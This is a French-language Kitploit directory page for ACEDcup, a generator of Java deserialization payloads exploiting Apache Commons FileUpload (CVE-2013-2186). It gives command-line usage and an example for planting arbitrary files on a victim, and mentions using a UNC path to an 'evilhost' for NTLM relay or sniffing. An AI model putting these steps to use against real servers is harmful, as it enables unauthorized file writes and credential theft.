Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ACEDcup — Générateur de payload pour attaque par désérialisation binaire Java avec Commons FileUpload (CVE-2013-2186) | Kitploit
Outils/GitHubGitHub/grrrdog/acedcup
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubgrrrdog/acedcup

ACEDcup

Générateur de payload pour attaque par désérialisation binaire Java avec Commons FileUpload (CVE-2013-2186)

Voir le dépôt
3714il y a 10 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ACEDcup

L'outil ACEDcup est un générateur de charges utiles pour l'attaque de désérialisation binaire Java (ACED)

Pour Apache Commons FileUpload ver <= 1.3 (CVE-2013-2186) et Oracle JDK ver < 7u40

L'attaque fonctionne même avec les versions plus récentes de la librairie ou de Java. Nous pouvons téléverser n'importe quel contenu dans n'importe quel répertoire, mais nous ne pouvons pas contrôler le nom du fichier (quelque chose comme upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp) dans cette situation. Cependant, cela peut être utile dans certains cas.

Nous pouvons également effectuer une attaque de relais/reniflage NTLM (en utilisant \\evilhost\any\path) si votre cible est sur un système d'exploitation Windows.

Utilisation

root@kitploit:~
  1) Tout d'abord, nous créons une charge utile sérialisée :
  java -jar aced_cup.jar /path/payload /path/target /path/out 1
  
  /path/payload - le chemin vers un fichier contenant votre charge utile
  /path/target - le chemin vers un fichier qui sera créé sur votre victime (cela sera stocké dans la charge utile sérialisée)
  /path/out - le chemin vers un fichier contenant la charge utile sérialisée
  0 - désactive la terminaison par octet nul si vous attaquez un système corrigé (sans octet nul - par défaut)

  2) Ensuite, nous chargeons la charge utile sérialisée dans le lecteur sérialisé (si nous voulons tester la vulnérabilité sur votre hôte) :
  java -jar ser_reader serialized_payload.txt
  
  ser_reader tente de désérialiser la charge utile et, en raison d'une vulnérabilité dans sa bibliothèque, crée un nouveau fichier dans le répertoire spécifié.

Exemple

java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt

```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````

Télécharger l’outil